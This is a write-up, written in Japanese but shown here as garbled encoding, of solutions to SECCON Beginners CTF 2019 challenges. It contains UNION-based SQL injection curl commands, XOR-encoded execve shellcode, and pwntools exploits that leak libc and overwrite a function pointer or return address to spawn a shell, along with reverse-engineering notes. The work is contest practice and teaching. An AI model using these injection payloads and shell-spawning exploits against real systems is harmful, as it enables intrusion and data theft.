SECCON Beginners CTF 2019 writeup
2891 points 24th place
åˆå¿ƒè€…å‘ã‘らã—ã„ã®ã§å‡ºã¦ã¿ãŸã€‚ WebãŒè§£ã‘ãªã•ã™ãŽã‚‹ã£ã½ã„ã®ã§ãªã‚“ã¨ã‹ã—ãŸã„。
Web: [warmup] Ramen
ãªãœã‹ãƒ©ãƒ¼ãƒ¡ãƒ³åº—員を検索ã§ãã‚‹Webページã«éš ã•ã‚ŒãŸãƒ•ãƒ©ã‚°ã‚’探ã™ã€‚åå‰ã®éƒ¨åˆ†æ–‡å—列ã§ãƒ’ットã™ã‚‹ã®ã§ã€SQLã®LIKEã§å–ã£ã¦ãã¦ã‚‹ã®ã‹ãªã€‚ã“ã‚Œã¯ã„ã‚ゆるã‚ã®æœ‰åãªSQLインジェクションをã—ã‚ã¨è¨€ã†ã“ã¨ãªã®ã‹ï¼Ÿ
ã¾ã‚普段何気ãªã—ã«ä½¿ã£ã¦ã„る言葉ã§ã‚‚æ£ç›´å®Ÿéš›ã«ã‚„ã£ãŸã“ã¨ã¯ãªã‹ã£ãŸã‚“ã§è©¦è¡ŒéŒ¯èª¤çµæ§‹å¤§å¤‰ã ã£ãŸã€‚ã¾ãšã‚¯ã‚¨ãƒªã‚’通ã™ã®ãŒåˆå¿ƒè€…ã«ã¯çµæ§‹é›£ã—ã‹ã£ãŸã€‚変ãªã‚¯ã‚¨ãƒªã‚’入れるã¨ã€Uncaught Error: Call to a member function fetchAll() on boolean in /var/www/web/public/index.php:11 ã¨ã‹ã®ãƒ¡ãƒƒã‚»ãƒ¼ã‚¸ãŒè¿”ã£ã¦ãã‚‹ã®ã§ã€PHPãªã®ã‹ã¨æ€ã£ãŸã€‚
ãŠãらã SELECT ??, ?? FROM ?? WHERE ?? LIKE '$query' ... ã®ã‚ˆã†ã«æ›¸ã„ã¦ã‚ã‚‹ã®ã ã‚ã†ã‹ï¼Ÿãªã‚“ã¨ãªã後åŠã‚’コメントアウトã™ã‚Œã° ã„ã„åŠ æ¸›ã«é€šã‚‹ã®ã‹ãªã¨ã‹æ€ã£ã¦ã„ãŸã®ã ã‘ã©ã€ã‚«ãƒ³ãƒžã®å¯¾å¿œãŒã¡ã‚ƒã‚“ã¨ä»˜ã„ã¦ã„ãªã„ã¨å—ã‘付ã‘ã¦ãã‚Œãªã„ã¿ãŸã„ã§ã€ãã‚Œã¨ãƒ†ãƒ¼ãƒ–ルåã¨ã‚«ãƒ©ãƒ åã¯ã¡ã‚ƒã‚“ã¨å˜åœ¨ã™ã‚‹ã‚‚ã®ã‚’入れãªã„ã¨fetchAll()ãŒã‚³ã‚±ã‚‹ã‚‰ã—ã‹ã£ãŸã€‚
ãã‚Œã§ã€SQLインジェクションã§ã¯UNIONを使ã£ã¦åˆ—ã‚’ç„¡ç†çŸ¢ç†è¿½åŠ ã™ã‚‹ã®ãŒå®šçŸ³ã‚‰ã—ã„ã®ã§ã€ã¨ã‚Šã‚ãˆãš ' UNION SELECT 'hoge', 'moge'; --' ã¨ã‹ã‚„ã‚‹ã¨ã€ãƒ©ãƒ¼ãƒ¡ãƒ³åº—å“¡ã«ã‚¹ãƒžãƒ›å¤ªéƒŽã‚’紛れ込ã¾ã›ã‚‹ã“ã¨ã«æˆåŠŸã—ãŸã€‚
ãƒãƒƒã‚¯ã‚¨ãƒ³ãƒ‰ãŒä½•ã‹ã‚ˆã分ã‹ã‚‰ãªã‹ã£ãŸã®ã§ã€ã§ã‚‚ã¾ã‚ã“ã‚Œã¯sqliteã‹postgresã‹mysqlã‹ã—ã‹ãªã„ã¨æ€ã†ã®ã§ã€ãれらを区別ã§ããã†ãªã‚‚ã®ã‚’é ‘å¼µã£ã¦ã‚¤ãƒ³ã‚¿ãƒ¼ãƒãƒƒãƒˆã§èª¿ã¹ã‚‹ã¨ã€MySQLらã—ã„ã¨ã„ã†ã“ã¨ãŒåˆ†ã‹ã£ãŸã€‚ãªã®ã§ã€MySQLã§ãƒ†ãƒ¼ãƒ–ルを列挙ã§ãã‚‹SQLクエリを調ã¹ã¦ã€
$ curl -X POST "https://ramen.quals.beginners.seccon.jp/?username=' union SELECT table_name,table_rows from information_schema.tables; -- '"
ã“ã†ã„ã†ã‚¯ã‚¨ãƒªã‚’投ã’ã¦ã¿ã‚‹ã¨ã€ãƒ†ãƒ¼ãƒ–ル一覧ãŒã ã ーã£ã¨æµã‚Œã¦ããŸã€‚ãã®ä¸ã« flag ã¨ã„ã†ã®ãŒã‚ã£ãŸã®ã§ã€å¤šåˆ†ã“ã‚ŒãŒãã†ãªã‚“ã ã‚ã†ã€‚ã¡ãªã¿ã«table_rows も表示ã•ã›ã¦ã¿ãŸã®ã ãŒã€ã“ã‚ŒãŒ0ã«ãªã£ã¦ã„る。members ã¨ã„ã†ãƒ†ãƒ¼ãƒ–ルもã‚ã£ã¦ã€ã“ã‚Œã¯3人ã„ã‚‹ã¯ãšãªã®ã«ã€ã“ã‚Œã®table_rowsã¯2ã«ãªã£ã¦ã„ãŸã®ã§ã€æ•°ãˆæ–¹ãŒãªãœã‹0オリジンãªã®ã ã‚ã†ã‹ã€‚
テーブルåãŒåˆ†ã‹ã£ãŸã®ã§ã€ã¤ãŽã«ã©ã†ã„ã†ã‚«ãƒ©ãƒ ãŒã‚ã‚‹ã®ã‹ã‚’調ã¹ã‚‹ã‚¯ã‚¨ãƒªã‚’投ã’る。
$ curl -X POST "https://ramen.quals.beginners.seccon.jp/?username=' union SELECT column_name, column_type from information_schema.columns where table_name='flag'; -- '"
flag ã¨ã„ã†ãƒ†ãƒ¼ãƒ–ル㮠flag ã¨ã„ã†ã‚«ãƒ©ãƒ ã«å¤šåˆ†ãƒ•ãƒ©ã‚°ãŒå…¥ã£ã¦ã„ã‚‹ã“ã¨ãŒåˆ†ã‹ã£ãŸã€‚ãªã®ã§ã€æœ€çµ‚çš„ã«æ¬¡ã®ã‚ˆã†ãªã‚¯ã‚¨ãƒªã§ãƒ•ãƒ©ã‚°ãŒå¾—られãŸã€‚
curl -X POST "https://ramen.quals.beginners.seccon.jp/?username=' union SELECT flag,flag from flag; -- '"
得られãŸãƒ•ãƒ©ã‚°ã¯ ctf4b{a_simple_sql_injection_with_union_select}
ãµãƒ¼ã‚€ã“ã‚ŒãŒã“ã†ã„ã†ç³»ã§ä¸€ç•ªã‚·ãƒ³ãƒ—ルãªæ„Ÿã˜ãªã®ã‹ãªã‚ã¨æ€ã£ãŸã€‚
Pwnable: [warmup] shellcoder
ã¨ã‚Šã‚ãˆãšä¸Žãˆã‚‰ã‚ŒãŸãƒã‚¤ãƒŠãƒªã‚’逆コンパイルã—ã¦ã¿ã‚‹ã€‚
undefined8 main(void) { code *__buf; char *pcVar1; __buf = (code *)mmap((void *)0x0,0x1000,7,0x21,-1,0); puts("Are you shellcoder?"); read(0,__buf,0x28); pcVar1 = strchr((char *)__buf,0x62); // b if (pcVar1 == (char *)0x0) { pcVar1 = strchr((char *)__buf,0x69); // i if (pcVar1 == (char *)0x0) { pcVar1 = strchr((char *)__buf,0x6e); // n if (pcVar1 == (char *)0x0) { pcVar1 = strchr((char *)__buf,0x73); // s if (pcVar1 == (char *)0x0) { pcVar1 = strchr((char *)__buf,0x68); // h if (pcVar1 == (char *)0x0) { (*__buf)(); return 0; } } } } } puts("Payload contains invalid character!!"); /* WARNING: Subroutine does not return */ _exit(0); }
é€ã‚Šã¤ã‘ãŸãƒ‡ãƒ¼ã‚¿ã« binsh ã®ã„ãšã‚Œã‹ã®æ–‡å—ãŒå«ã¾ã‚Œã¦ã„ãªã‘ã‚Œã°ãれを実行ã—ã¦ãれるプãƒã‚°ãƒ©ãƒ らã—ã„。プãƒã‚°ãƒ©ãƒ ä¸ã«ãれらã—ãæ–‡å—列もå«ã¾ã‚Œã¦ã„ãªã„ã—ã€ãã†ã„ã†ãƒã‚¤ãƒˆãŒå«ã¾ã‚Œãªã„よã†ã«è‡ªåŠ›ã§execveを呼ã³å‡ºã™0x28ãƒã‚¤ãƒˆä»¥å†…ã®ã‚³ãƒ¼ãƒ‰æ›¸ãã®ã‚ã‚“ã©ãã•ãã†ã ãªã‚・・・ã¨æ€ã£ãŸã‚‰ã€ã‚¤ãƒ³ã‚¿ãƒ¼ãƒãƒƒãƒˆã«è½ã¡ã¦ãŸã‚³ãƒ¼ãƒ‰ã‚’拾ã£ã¦ããŸã‚‰ãã®ã¾ã¾å‹•ã„ã¦ã—ã¾ã£ãŸã€‚ãªã®ã§ãれをpwntoolsã§é€ã‚Šã¤ã‘ã¦çµ‚了。
from pwn import * context.arch = 'amd64' context.log_level = 'debug' io = remote('153.120.129.186', 20000) asms = """ xor eax, eax mov rbx, 0xFF978CD091969DD1 neg rbx push rbx push rsp pop rdi cdq push rdx push rdi push rsp pop rsi mov al, 0x3b syscall """ bin = asm(asms) io.recv() io.send(bin) io.interactive()
フラグ㯠ctf4b{Byp4ss_us!ng6_X0R_3nc0de}。
ãªã‚‹ã»ã©xorã—ã¦ãƒã‚¤ãƒ‘スã—ã‚ã¨ã„ã†è¶£æ—¨ã®å•é¡Œã ã£ãŸã®ã‹ã€‚
Pwnable: OneLine
ã“れもã¨ã‚Šã‚ãˆãšé€†ã‚³ãƒ³ãƒ‘イル。
undefined8 main(void) { void *__buf; ulong uVar1; __buf = calloc(0x28,1); *(code **)((long)__buf + 0x20) = write; printf("You can input text here!\n>> "); read(0,__buf,0x28); (**(code **)((long)__buf + 0x20))(1,__buf,0x28,__buf); printf("Once more again!\n>> "); uVar1 = read(0,__buf,0x28); (**(code **)((long)__buf + 0x20))(1,__buf,uVar1 & 0xffffffff,__buf); return 0; }
ãƒãƒƒãƒ•ã‚¡ã®0x20~0x28ãƒã‚¤ãƒˆç›®ã«writeã®ãƒã‚¤ãƒ³ã‚¿ã‚’書ã込んã§ã€ãれをãƒãƒƒãƒ•ã‚¡ã®ãƒã‚¤ãƒ³ã‚¿ã‚’引数ã«å‘¼ã³å‡ºã™ã‚³ãƒ¼ãƒ‰ã«ãªã£ã¦ã„ã‚‹ã®ã§ã€0x20ãƒã‚¤ãƒˆã®æ‰€ã«å‘¼ã³å‡ºã—ãŸã„関数ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’ã€0x00~0x20ã®ã¨ã“ã‚ã«ãƒ‡ãƒ¼ã‚¿ã‚’書ãè¾¼ã‚ã°è‰¯ã•ãã†ã€‚
ã—ã‹ã‚‚ã”親切ã«2回readã—ã¦ãれるプãƒã‚°ãƒ©ãƒ ã 。ãªãŠã‹ã¤1回目ã¯èªã‚“ã ãƒã‚¤ãƒˆæ•°ã§ã¯ãªãã€ãƒã‚¤ãƒ³ã‚¿ã¾ã§å«ã‚ãŸé ˜åŸŸã‚’writeã—ã¦ã„ã‚‹ã®ã§ã€1回目ã§ä½•ã‹é©å½“ã«çŸã„クエリを投ã’ã‚Œã°writeã®ãƒã‚¤ãƒ³ã‚¿ãŒå‹æ‰‹ã«é™ã£ã¦ãる。ã“ã‚Œã§libã®ãƒ™ãƒ¼ã‚¹ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’求ã‚ã¦ã€2回目ã§system を呼ã³å‡ºã›ã°è‰¯ã•ãã†ã 。
from pwn import * context.arch = 'amd64' context.log_level = 'debug' io = remote('153.120.129.186', 10000) elf = ELF('oneline') libc = ELF('libc-2.27.so') io.recv() io.send(cyclic(0x20)) io.recv(0x20) write_libc = u64(io.recv(8)) libc_base = write_libc - libc.symbols['write'] system_addr = libc_base + libc.symbols['system'] io.recv() io.send(b"/bin/sh" + b'\x00' * (0x20 - 7) + p64(libc_base + system_addr)) io.interactive()
ã¨ã“ã‚ãŒã€ãªãœã‹ã“ã‚Œã¯SIGSEGVã§å‹•ã‹ãªã‹ã£ãŸï¼ˆãªã‚“ã§ã ã‚ã†ï¼‰ã€‚
ã—ã‹ãŸãŒãªã„ã®ã§åˆ¥ã®ã‚¬ã‚¸ã‚§ãƒƒãƒˆãŒä½¿ãˆãªã„ã‹ã¨one_gadgetã¨ã„ã†ãƒ„ールã§libを調ã¹ã‚‹ã¨ã€
$ one_gadget libc-2.27.so 0x4f2c5 execve("/bin/sh", rsp+0x40, environ) constraints: rcx == NULL 0x4f322 execve("/bin/sh", rsp+0x40, environ) constraints: [rsp+0x40] == NULL 0x10a38c execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL
ã“ã‚“ãªã®ãŒè¦‹ã¤ã‹ã£ãŸã®ã§ã€ã“ã‚Œã®2個目を使ã†ã¨ã†ã¾ãè¡Œã£ãŸã€‚
from pwn import * context.arch = 'amd64' context.log_level = 'debug' io = remote('153.120.129.186', 10000) elf = ELF('oneline') libc = ELF('libc-2.27.so') io.recv() io.send(cyclic(0x20)) io.recv(0x20) write_libc = u64(io.recv(8)) libc_base = write_libc - libc.symbols['write'] io.recv() io.send(b'\x00' * 0x20 + p64(libc_base + 0x4f322)) io.interactive()
フラグ㯠ctf4b{0v3rwr!t3_Func7!on_p0int3r}。
関数ãƒã‚¤ãƒ³ã‚¿ã‚’上書ãã™ã‚‹ã ã‘ã§ã¯ä¸Šæ‰‹ãã„ã‹ãªã‹ã£ãŸç†ç”±ã¯å¾Œã§èª¿ã¹ã¦ãŠããŸã„。ã‚ã¨ãªãœã“ã®å•é¡Œone lineã¨ã„ã†åå‰ãªã‚“ã ã‚ã†ã€‚二回èªã‚“ã§ã„ã‚‹ã®ã«ã€‚
Pwnable: memo
ã¾ãŸã¾ãŸã¨ã‚Šã‚ãˆãšé€†ã‚³ãƒ³ãƒ‘イル。
int main(void) { FILE *__stream; char *pcVar1; long lVar2; undefined8 uStack96; char local_58 [8]; undefined auStack80 [56]; undefined *local_18; uint local_c; do { uStack96 = 0x4006fb; printf("Input size : "); uStack96 = 0x400713; pcVar1 = fgets(local_58,0x40,stdin); if (pcVar1 == (char *)0x0) { return 0xffffffff; } uStack96 = 0x40072e; local_c = atoi(local_58); } while (local_c < 0x20); lVar2 = SUB168((ZEXT816(0) << 0x40 | ZEXT816((long)(int)local_c + 0x1e)) / ZEXT816(0x10),0); local_18 = auStack80 + lVar2 * -0x10; (&uStack96)[lVar2 * 0x1ffffffffffffffe] = 0x400786; printf("Input Content : "); __stream = stdin; (&uStack96)[lVar2 * 0x1ffffffffffffffe] = 0x40079e; fgets(local_18,0x20,__stream,*(undefined *)(&uStack96 + lVar2 * 0x1ffffffffffffffe)); (&uStack96)[lVar2 * 0x1ffffffffffffffe] = 0x4007b6; printf("Your Content : %s\n",local_18); return 0; }
ã‚„ã£ã¦ã„るコードã¯ã ã„ã¶è¬Žã ã—ã€ã†ã¾ãC言語ã«ãƒžãƒƒãƒ”ングã§ããªãã¦ã ã„ã¶å¤‰ãªã“ã¨ã«ãªã£ã¡ã‚ƒã£ã¦ã‚‹ã€‚途ä¸ã§ã‚¹ã‚¿ãƒƒã‚¯ãƒã‚¤ãƒ³ã‚¿ã‚’ã„ã˜ã£ã¦ã‚‹ã®ã§ã€ã‚¹ã‚¿ãƒƒã‚¯èªã¿æ›¸ãã®ã‚³ãƒ¼ãƒ‰ã‚‚èªã¿ã¥ã‚‰ããªã£ã¦ã‚‹ã€‚ã“ã®è¾ºã¯ç´ ç›´ã«ã‚¢ã‚»ãƒ³ãƒ–リèªã‚“ã æ–¹ãŒã‚ã‹ã‚Šã‚„ã™ã‹ã£ãŸã®ã§ã€Cã¨ã‚¢ã‚»ãƒ³ãƒ–リ両方å‚考ã«ã—ãªãŒã‚‰è§£èªã—ãŸçµæžœã€è¦ã™ã‚‹ã«ã€
- 最åˆã«0x20より大ããªæ•´æ•°ã‚’入力ã•ã›ã¦
- RSP -= (ãã®æ•´æ•°+0x1e) / 0x10 * 0x10 ã—ã¦
- fgets(RSP, 0x20, stdin) ã‚’ã™ã‚‹
ãªã‚“ã§ã‚µã‚¤ã‚ºã‚’入力ã•ã›ã¦ã‹ã‚‰å›ºå®šã®é•·ã•ã®fgetsã‚’ã™ã‚‹ã®ã‹ã¨ã‹ã€ã“ã®åˆ‡ã‚Šä¸Šã’処ç†å¾®å¦™ã«åˆ‡ã‚Šä¸Šã’ã«ãªã£ã¦ç„¡ããªã„ã‹ã¨ã‹æ€ã£ãŸã‚Šã€ã‚ˆã分ã‹ã‚‰ãªã„ã¨ã“ã‚ã¯æ®‹ã£ãŸãŒã€ã“ã®å•é¡Œã®ã‚モã¯ã€æœ€åˆã®æ•´æ•°ã®å…¥åŠ›ã®æ™‚ã«ã€ç¬¦å·ç„¡ã—ã§ã‚µã‚¤ã‚ºã®æ¯”較をやã£ã¦ã—ã¾ã£ã¦ã„ã‚‹ã®ã§ã€è² ã®æ•°ãŒå…¥åŠ›å‡ºæ¥ã¦ã—ã¾ã†ã¨ã„ã†æ‰€ã ã‚ã†ã€‚
è² ã®æ•°ãŒå…¥åŠ›å‡ºæ¥ã¦ã—ã¾ã†ã¨è¨€ã†ã“ã¨ã«ã‚ˆã£ã¦ã€RSPを引ãç®—ã—ã¦mainã®ãƒªã‚¿ãƒ¼ãƒ³ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’壊ã›ãªã„ã¨ã„ã†å®‰å…¨è¨è¨ˆï¼ˆï¼Ÿï¼‰ãŒã€é€†ã«è¶³ã—ç®—ã—ã¦ãƒ”ンãƒã‚¤ãƒ³ãƒˆã§ç ´å£Šã§ãるよã†ã«ãªã£ã¦ã—ã¾ã£ã¦ã„る。
0x10ã§åˆ‡ã‚Šä¸Šã’ã¦ã„ã‚‹ã®ã§ã€RSPã®è¶³ã—引ãã¯0x10ã®å€æ•°ã§ã—ã‹è¡Œãˆãªã„。ã“ã®main関数ã¯ã‚¹ã‚¿ãƒƒã‚¯ã‚’0x50ãƒã‚¤ãƒˆä½¿ã£ã¦ã„ã‚‹ã®ã§ã€RSPã‚’0x50足ã—ã¦ã‚„ã‚Œã°ã€fgetsã§æ›¸ã込むãƒãƒƒãƒ•ã‚¡ãƒ¼ã®ã¡ã‚‡ã†ã©8ãƒã‚¤ãƒˆç›®ã‹ã‚‰16ãƒã‚¤ãƒˆç›®ãŒmainã®ãƒªã‚¿ãƒ¼ãƒ³ã‚¢ãƒ‰ãƒ¬ã‚¹ã«ãªã‚‹ã‚ˆã†ã«æŒã£ã¦ã“れる。ã‹ã¤16ãƒã‚¤ãƒˆã»ã©ä½™è¨ˆã«ãƒ‡ãƒ¼ã‚¿ã‚’書ã込むã“ã¨ãŒã§ãる。
å¼ã‹ã‚‰é€†ç®—ã™ã‚Œã°ã€æœ€åˆã«å…¥åŠ›ã™ã‚‹æ•°ã‚’ -95 ã‹ã‚‰ -110 ã®å€¤ã«ã™ã‚‹ã“ã¨ã§ã€RSPã«è¶³ã™å€¤ã‚’0x50ã«ã§ãる。
ãƒã‚¤ãƒŠãƒªä¸ã«ã¯ã€ãŠã‚ã¤ã‚‰ãˆå‘ãã«
void hidden(void) { system("sh"); exit(0); }
ã¨ã„ã†é–¢æ•°ãŒéš ã•ã‚Œã¦ã„ã‚‹ã®ã§ã€ãƒªã‚¿ãƒ¼ãƒ³ã‚¢ãƒ‰ãƒ¬ã‚¹ã“ã“ã«ã—ã¦ã‚„ã‚Œã°è‰¯ã•ãã†ã 。
ãŒã€ã“れをãã®ã¾ã¾èªã‚“ã§ã‚„ã‚‹ã¨SEGVã—ã¦ã—ã¾ã£ã¦ä¸Šæ‰‹ãå‹•ã‹ãªã„。
gdbã§ã‚ã£ã¡ã‚ƒé ‘å¼µã£ã¦è¿½ã£ã¦ã„ãã¨ã€system関数ã®gotエントリã®é…延ãƒã‚¤ãƒ³ãƒ‡ã‚£ãƒ³ã‚°ã‚’è¡Œã†éƒ¨åˆ†ã®ã‚³ãƒ¼ãƒ‰ã§è½ã¡ã¦ã„ã‚‹ã“ã¨ãŒåˆ†ã‹ã£ã¦ã€è½ã¡ã¦ã„ã‚‹ç†ç”±ã¯SSEã®movaps命令ã®ã‚¢ãƒ©ã‚¤ãƒ¡ãƒ³ãƒˆãŒãŠã‹ã—ã„ã ã‹ã‚‰ã ã¨ã€‚ãˆãˆï½¥ï½¥ï½¥ã€‚
movapsã§ã‚¢ã‚¯ã‚»ã‚¹ã—ã¦ã„るアドレスã¯RSPä¾å˜ã§ã€ã“ã“ãŒå‘¼ã³å‡ºã•ã‚Œã‚‹å‰ã«ã‚らã‹ã˜ã‚16ãƒã‚¤ãƒˆã‚¢ãƒ©ã‚¤ãƒ¡ãƒ³ãƒˆã«æƒã£ã¦ã„ãªã„ã¨æ»ã¬ã¿ãŸã„ã 。使ã†å´ãŒã‚¢ãƒ©ã‚¤ãƒ³ã—ãªãã¦è‰¯ã„ã‚“ã§ã™ã‹ã・・・?よã分ã‹ã‚‰ãªã„。
よã分ã‹ã‚‰ãªã„ã‘ã©ãã†ã„ã†ã“ã¨ãªã‚‰8ãƒã‚¤ãƒˆRSPã‚’ãšã‚‰ã—ã¦ã‚„ã‚Œã°è‰¯ã„ã®ã§ã€ç›´ã§hidden関数ã«é£›ã¶ã®ã§ã¯ãªãã¦ã€ã©ã“ã§ã‚‚ã„ã„ã‹ã‚‰ret命令ã«é£›ã¹ã°ã€å˜ã«8ãƒã‚¤ãƒˆã‚¹ã‚¿ãƒƒã‚¯ãŒãšã‚‰ã›ã‚‹ã€‚
from pwn import * context.arch = 'amd64' context.log_level = 'debug' io = remote('133.242.68.223', 35285) elf = ELF('./memo') io.recv() # -95 ~ -110 io.sendline('-104') io.recv() rop = ROP('./memo') rop.call(0x0040085c) rop.call('hidden') io.sendline(b'\x00'*8 + rop.chain()) io.interactive()
フラグ㯠ctf4b{h4ckn3y3d_574ck_b0f} 。
ã©ã†ã„ã†æ„味ãªã‚“ã ã‚ã†ï½¥ï½¥ï½¥ï¼Ÿ
Reversing: [warmup] Seccompare
ã¨ã‚Šã‚ãˆãšé€†ã‚³ãƒ³ãƒ‘イル。
undefined8 main(int iParm1,undefined8 *puParm2) { /// ... local_10 = *(long *)(in_FS_OFFSET + 0x28); if (iParm1 < 2) { printf("usage: %s flag\n",*puParm2); uVar2 = 1; } else { local_38 = 'c'; local_37 = 0x74; local_36 = 0x66; local_35 = 0x34; local_34 = 0x62; local_33 = 0x7b; local_32 = 0x35; local_31 = 0x74; local_30 = 0x72; local_2f = 0x31; local_2e = 0x6e; local_2d = 0x67; local_2c = 0x73; local_2b = 0x5f; local_2a = 0x31; local_29 = 0x73; local_28 = 0x5f; local_27 = 0x6e; local_26 = 0x30; local_25 = 0x74; local_24 = 0x5f; local_23 = 0x65; local_22 = 0x6e; local_21 = 0x30; local_20 = 0x75; local_1f = 0x67; local_1e = 0x68; local_1d = 0x7d; local_1c = 0; iVar1 = strcmp(&local_38,(char *)puParm2[1]); if (iVar1 == 0) { puts("correct"); } else { puts("wrong"); } uVar2 = 0; } // ... }
å˜ã«æ–‡å—列比較ã—ã¦ã‚‹ã ã‘ãªã®ã§ã¨ã¦ã‚‚ç°¡å˜ã€‚
フラグ㯠ctf4b{5tr1ngs_1s_n0t_en0ugh}。ãりゃãã†ã§ã™ã。
Reversing: Leakage
逆コンパイル。
undefined8 main(int iParm1,undefined8 *puParm2) { int iVar1; undefined8 uVar2; if (iParm1 < 2) { printf("usage: %s flag\n",*puParm2); uVar2 = 1; } else { iVar1 = is_correct(puParm2[1]); if (iVar1 == 0) { puts("wrong"); } else { puts("correct"); } uVar2 = 0; } return uVar2; }
is_correct ã¨ã„ã†é–¢æ•°ã§ãƒã‚§ãƒƒã‚¯ã—ã¦ã„るらã—ã„。
undefined8 is_correct(char *pcParm1) { char cVar1; size_t sVar2; undefined8 uVar3; int local_c; sVar2 = strlen(pcParm1); if (sVar2 == 0x22) { local_c = 0; while (local_c < 0x22) { cVar1 = convert((ulong)(byte)enc_flag[(long)local_c]); if (cVar1 != pcParm1[(long)local_c]) { return 0; } local_c = local_c + 1; } uVar3 = 1; } else { uVar3 = 0; } return uVar3; }
é•·ã•ã¯0x22ã€convertã¨ã„ã†é–¢æ•°ã§1æ–‡å—ãšã¤ã‚らã‹ã˜ã‚埋ã‚è¾¼ã¾ã‚Œã¦ã„るエンコード済ã¿ãƒ•ãƒ©ã‚°ã‚’デコードã—ã¦æ¯”較ã—ã¦ã„るよã†ã 。
ulong convert(byte bParm1)
{
// ...
local_cc = 10;
lVar1 = *(long *)(in_FS_OFFSET + 0x28);
local_d8 = s.2160._20_4_;
local_dc = s.2160._44_4_;
uVar17 = s.2160._0_4_;
uVar15 = s.2160._4_4_;
uVar14 = s.2160._12_4_;
uVar5 = s.2160._16_4_;
uVar19 = s.2160._28_4_;
uVar7 = s.2160._32_4_;
uVar16 = s.2160._40_4_;
uVar6 = s.2160._56_4_;
uVar4 = s.2160._48_4_;
uVar18 = s.2160._60_4_;
uVar12 = s.2160._8_4_;
uVar10 = s.2160._24_4_;
uVar13 = s.2160._36_4_;
uVar9 = s.2160._52_4_;
do {
uVar4 = uVar4 ^ uVar17 + uVar5;
uVar6 = uVar6 ^ uVar12 + uVar10;
uVar4 = uVar4 << 0x10 | uVar4 >> 0x10;
uVar6 = uVar6 << 0x10 | uVar6 >> 0x10;
uVar7 = uVar7 + uVar4;
uVar16 = uVar16 + uVar6;
uVar8 = uVar5 ^ uVar7;
uVar11 = uVar10 ^ uVar16;
uVar8 = uVar8 << 0xc | uVar8 >> 0x14;
uVar11 = uVar11 << 0xc | uVar11 >> 0x14;
uVar17 = uVar17 + uVar5 + uVar8;
uVar12 = uVar12 + uVar10 + uVar11;
uVar4 = uVar4 ^ uVar17;
uVar6 = uVar6 ^ uVar12;
uVar5 = uVar4 << 8 | uVar4 >> 0x18;
uVar6 = uVar6 << 8 | uVar6 >> 0x18;
uVar7 = uVar7 + uVar5;
uVar8 = uVar8 ^ uVar7;
uVar8 = uVar8 << 7 | uVar8 >> 0x19;
uVar9 = uVar9 ^ uVar15 + local_d8;
uVar10 = uVar9 << 0x10 | uVar9 >> 0x10;
uVar13 = uVar13 + uVar10;
uVar4 = local_d8 ^ uVar13;
uVar4 = uVar4 << 0xc | uVar4 >> 0x14;
uVar15 = uVar15 + local_d8 + uVar4;
uVar10 = uVar10 ^ uVar15;
// ......
ウワァァァ。
ã—ã‹ã—ã¾ã‚ã€is_correct関数内ã§0ã‚’è¿”ã™çž¬é–“ã«ã¯æ£ã—ã„æ–‡å—ãŒãƒ¬ã‚¸ã‚¹ã‚¿ä¸Šã«å˜åœ¨ã—ã¦ã„ã‚‹ã¯ãšãªã®ã§ã€ãƒ–レークãƒã‚¤ãƒ³ãƒˆã‚’仕掛ã‘ã¦ã‚„ã‚Œã°ã€å…ˆé ã‹ã‚‰ä¸€æ–‡å—ãšã¤æ£è§£ã‚’確定ã•ã›ã¦è¡Œãã“ã¨ã¯ã§ããã†ã 。
ãã—ã¦å‡ºã¦ããŸãƒ•ãƒ©ã‚°ã¯ ctf4b{le4k1ng_th3_f1ag_0ne_by_0ne}。
Reversing: Linear Operation
今回一番苦労ã—ãŸã®ãŒã“れ。
ã¨ã‚Šã‚ãˆãšmainã®é€†ã‚³ãƒ³ãƒ‘イル。
undefined8 main(void) { int iVar1; long in_FS_OFFSET; undefined8 local_58; undefined8 local_50; undefined8 local_48; undefined8 local_40; undefined8 local_38; undefined8 local_30; undefined8 local_28; undefined8 local_20; long local_10; local_10 = *(long *)(in_FS_OFFSET + 0x28); local_58 = 0; local_50 = 0; local_48 = 0; local_40 = 0; local_38 = 0; local_30 = 0; local_28 = 0; local_20 = 0; printf("input flag : "); __isoc99_scanf(&DAT_0040d042,&local_58); iVar1 = is_correct(&local_58); if (iVar1 == 0) { puts("wrong"); } else { puts("correct"); } if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { /* WARNING: Subroutine does not return */ __stack_chk_fail(); } return 0; }
ã§ã€is_correct 関数ãªã‚“ã ãŒã€ã“ã‚ŒãŒã‚ã¡ã‚ƒãã¡ã‚ƒã§ã‹ã„。ã§ã‹ã™ãŽã¦ãªã‹ãªã‹é€†ã‚³ãƒ³ãƒ‘イルãŒçµ‚ã‚らãªã„。
ãã—ã¦å‡ºã¦ããŸã®ãŒã“れ。
ã“ã‚Œã‚’é ‘å¼µã£ã¦èªã‚€ã¨ã€åŸºæœ¬çš„ã«ã¯
(bVar2 = pbParm1[0x13] << 4 | pbParm1[0x13] >> 4, bVar2 = (byte)(((uint)bVar2 & 0x3ffffff3) << 2) | (byte)((int)(uint)bVar2 >> 2) & 0x33, ((ulong)(byte)( (bVar2 * 2 & 0xaa | (byte)((int)(uint)bVar2 >> 1) & 0x55) ^ pbParm1[3]) ^ 0x11) * 0x22 == 0x1276))) &&
ã“ã†ã„ã†å¼ãŒå¤§é‡ã«&&ã§ç¹‹ã’られãŸã‚‚ã®ã ã¨è¨€ã†ã“ã¨ãŒåˆ†ã‹ã‚‹ã€‚ãã—ã¦ã€ãã®ã†ã¡ã®
(bVar2 = pbParm1[0x13] << 4 | pbParm1[0x13] >> 4, bVar2 = (byte)(((uint)bVar2 & 0x3ffffff3) << 2) | (byte)((int)(uint)bVar2 >> 2) & 0x33, ... (bVar2 * 2 & 0xaa | (byte)((int)(uint)bVar2 >> 1) & 0x55) ...
ã“ã®éƒ¨åˆ†ã¯ã€è¦ã™ã‚‹ã«ç‰¹å®šã®æ–‡å—ã®ãƒ“ãƒƒãƒˆé †ã‚’é€†ã«ã—ã¦ã„る処ç†ã ã¨åˆ†ã‹ã‚‹ã€‚
ãªã®ã§ã€çµå±€ is_correct ãŒã‚„ã£ã¦ã„る処ç†ã¯ã€
bit_reverse(s[i]) (+|*|^) s[j] == C
ã®ã‚ˆã†ãªå‡¦ç†ã ã¨åˆ†ã‹ã‚‹(定数を畳ã¿è¾¼ã‚“ã§ç°¡ç´„ã™ã‚‹ã¨)。
